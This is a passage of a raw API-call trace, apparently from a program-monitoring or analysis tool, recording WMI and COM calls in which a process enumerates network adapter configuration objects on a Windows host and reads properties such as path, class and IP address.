	[0127.525] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.525] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.525] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.525] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.526] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.526] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=0") returned 0x29
	[0127.526] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.526] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04410*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2c90, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c85c*=8200, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.526] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.526] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.527] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.527] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.527] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="__PATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.527] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x3f
	[0127.527] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c900 | out: puCount=0xd7ef71c900*=0x2) returned 0x0
	[0127.527] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c900*=0x17, pszText=0x0) returned 0x0
	[0127.527] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c900*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.527] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71c8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=0, plFlavor=0xd7ef71c8e8*=0 | out: pVal=0xd7ef71c8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=8200, plFlavor=0xd7ef71c8e8*=32) returned 0x0
	[0127.528] IWbemClassObject:Get (in: This=0x2ad206a5000, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32 | out: pVal=0xd7ef71cb20*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32) returned 0x0
	[0127.528] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2b40
	[0127.528] IEnumWbemClassObject:Next (in: This=0x2ad3bae1500, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2b40, puReturned=0xd7ef71d3f8 | out: apObjects=0x2ad3bac2b40*=0x2ad206a72f0, puReturned=0xd7ef71d3f8*=0x1) returned 0x0
	[0127.529] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c720 | out: ppvObject=0xd7ef71c720*=0x2ad206a72f0) returned 0x0
	[0127.529] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c7a0 | out: ppvObject=0xd7ef71c7a0*=0x0) returned 0x80004002
	[0127.529] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c538 | out: ppvObject=0xd7ef71c538*=0x0) returned 0x80004002
	[0127.529] IUnknown:AddRef (This=0x2ad206a72f0) returned 0x3
	[0127.530] CoGetContextToken (in: pToken=0xd7ef71c3f0 | out: pToken=0xd7ef71c3f0) returned 0x0
	[0127.530] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3b0 | out: ppvObject=0xd7ef71c3b0*=0x2ad206a72f8) returned 0x0
	[0127.530] IMarshal:GetUnmarshalClass (in: This=0x2ad206a72f8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c3e0 | out: pCid=0xd7ef71c3e0) returned 0x0
	[0127.530] IUnknown:Release (This=0x2ad206a72f8) returned 0x3
	[0127.530] CoGetContextToken (in: pToken=0xd7ef71c3c0 | out: pToken=0xd7ef71c3c0) returned 0x0
	[0127.530] IUnknown:AddRef (This=0x2ad206a72f0) returned 0x4
	[0127.530] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4d8 | out: ppvObject=0xd7ef71c4d8*=0x0) returned 0x80004002
	[0127.530] IUnknown:Release (This=0x2ad206a72f0) returned 0x3
	[0127.530] IUnknown:Release (This=0x2ad206a72f0) returned 0x2
	[0127.530] CoGetContextToken (in: pToken=0xd7ef71c880 | out: pToken=0xd7ef71c880) returned 0x0
	[0127.530] CoGetContextToken (in: pToken=0xd7ef71c7c0 | out: pToken=0xd7ef71c7c0) returned 0x0
	[0127.530] IUnknown:AddRef (This=0x2ad206a72f0) returned 0x3
	[0127.530] IUnknown:QueryInterface (in: This=0x2ad206a72f0, riid=0xd7ef71c900*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71c8e0 | out: ppvObject=0xd7ef71c8e0*=0x2ad206a72f0) returned 0x0
	[0127.530] IUnknown:Release (This=0x2ad206a72f0) returned 0x3
	[0127.530] IUnknown:Release (This=0x2ad206a72f0) returned 0x2
	[0127.530] IUnknown:Release (This=0x2ad206a72f0) returned 0x1
	[0127.530] CoTaskMemFree (pv=0x2ad3bac2b40) 
	[0127.530] CoGetContextToken (in: pToken=0xd7ef71d200 | out: pToken=0xd7ef71d200) returned 0x0
	[0127.531] IUnknown:AddRef (This=0x2ad206a72f0) returned 0x2
	[0127.531] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d370*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d36c*=0, plFlavor=0xd7ef71d368*=0 | out: pVal=0xd7ef71d370*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d36c*=3, plFlavor=0xd7ef71d368*=64) returned 0x0
	[0127.531] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PATH", lFlags=0, pVal=0xd7ef71d310*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d30c*=0, plFlavor=0xd7ef71d308*=0 | out: pVal=0xd7ef71d310*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71d30c*=8, plFlavor=0xd7ef71d308*=64) returned 0x0
	[0127.534] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0127.534] CoGetObjectContext (in: riid=0xd7ef71d2a8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2a0 | out: ppv=0xd7ef71d2a0*=0x2ad205dbe30) returned 0x0
	[0127.535] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d2c0 | out: pAptType=0xd7ef71d2c0*=1) returned 0x0
	[0127.535] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d3c8 | out: ppvObject=0xd7ef71d3c8*=0x0) returned 0x80004002
	[0127.535] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.535] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c930 | out: ppv=0xd7ef71c930*=0x2ad3bb1e740) returned 0x0
	[0127.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1e740, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c640 | out: ppvObject=0xd7ef71c640*=0x0) returned 0x80004002
	[0127.535] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1e740, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c628 | out: ppvObject=0xd7ef71c628*=0x2ad3bb11600) returned 0x0
	[0127.535] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c530 | out: ppvObject=0xd7ef71c530*=0x2ad3bb11600) returned 0x0
	[0127.535] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c5b0 | out: ppvObject=0xd7ef71c5b0*=0x0) returned 0x80004002
	[0127.536] IUnknown:AddRef (This=0x2ad3bb11600) returned 0x3
	[0127.536] CoGetContextToken (in: pToken=0xd7ef71c200 | out: pToken=0xd7ef71c200) returned 0x0
	[0127.536] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c1c0 | out: ppvObject=0xd7ef71c1c0*=0x2ad3bb1e880) returned 0x0
	[0127.536] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1e880, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c1f0 | out: pCid=0xd7ef71c1f0) returned 0x0
	[0127.536] IUnknown:Release (This=0x2ad3bb1e880) returned 0x3
	[0127.536] CoGetContextToken (in: pToken=0xd7ef71c1d0 | out: pToken=0xd7ef71c1d0) returned 0x0
	[0127.536] IUnknown:AddRef (This=0x2ad3bb11600) returned 0x4
	[0127.536] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c2e8 | out: ppvObject=0xd7ef71c2e8*=0x0) returned 0x80004002
	[0127.536] IUnknown:Release (This=0x2ad3bb11600) returned 0x3
	[0127.536] WbemDefPath:IUnknown:Release (This=0x2ad3bb1e740) returned 0x0
	[0127.536] IUnknown:Release (This=0x2ad3bb11600) returned 0x1
	[0127.536] CoGetContextToken (in: pToken=0xd7ef71cf00 | out: pToken=0xd7ef71cf00) returned 0x0
	[0127.536] CoGetContextToken (in: pToken=0xd7ef71ce40 | out: pToken=0xd7ef71ce40) returned 0x0
	[0127.537] IUnknown:AddRef (This=0x2ad3bb11600) returned 0x2
	[0127.537] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0xd7ef71cf80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cf60 | out: ppvObject=0xd7ef71cf60*=0x2ad3bb11600) returned 0x0
	[0127.537] IUnknown:Release (This=0x2ad3bb11600) returned 0x2
	[0127.537] IUnknown:Release (This=0x2ad3bb11600) returned 0x1
	[0127.537] CoGetContextToken (in: pToken=0xd7ef71d080 | out: pToken=0xd7ef71d080) returned 0x0
	[0127.537] CoGetContextToken (in: pToken=0xd7ef71cfc0 | out: pToken=0xd7ef71cfc0) returned 0x0
	[0127.537] IUnknown:AddRef (This=0x2ad3bb11600) returned 0x2
	[0127.537] IUnknown:QueryInterface (in: This=0x2ad3bb11600, riid=0xd7ef71d100*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71d0e0 | out: ppvObject=0xd7ef71d0e0*=0x2ad3bb11600) returned 0x0
	[0127.537] IUnknown:Release (This=0x2ad3bb11600) returned 0x2
	[0127.537] IUnknown:AddRef (This=0x2ad3bb11600) returned 0x3
	[0127.537] IWbemPath:SetText (This=0x2ad3bb11600, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x0
	[0127.537] IUnknown:Release (This=0x2ad3bb11600) returned 0x2
	[0127.537] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71d340 | out: puCount=0xd7ef71d340*=0x2) returned 0x0
	[0127.537] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d340*=0x17, pszText=0x0) returned 0x0
	[0127.537] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71d340*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d340*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.537] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.537] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.537] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.537] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.537] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.537] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.537] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.538] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.538] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.538] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.538] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.538] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.538] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.538] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.539] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c870 | out: puCount=0xd7ef71c870*=0x2) returned 0x0
	[0127.539] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c870*=0x17, pszText=0x0) returned 0x0
	[0127.539] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c870*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.539] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c870 | out: puCount=0xd7ef71c870*=0x2) returned 0x0
	[0127.539] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c870*=0x17, pszText=0x0) returned 0x0
	[0127.539] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c870*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c870*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.539] IWbemClassObject:GetNames (in: This=0x2ad206a72f0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c860 | out: pNames=0xd7ef71c860*="\x01ƀ\x08") returned 0x0
	[0127.539] SafeArrayGetDim (psa=0x2ad3bb041d0) returned 0x1
	[0127.539] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.539] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.539] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.539] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.539] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.539] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.539] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.539] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.540] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
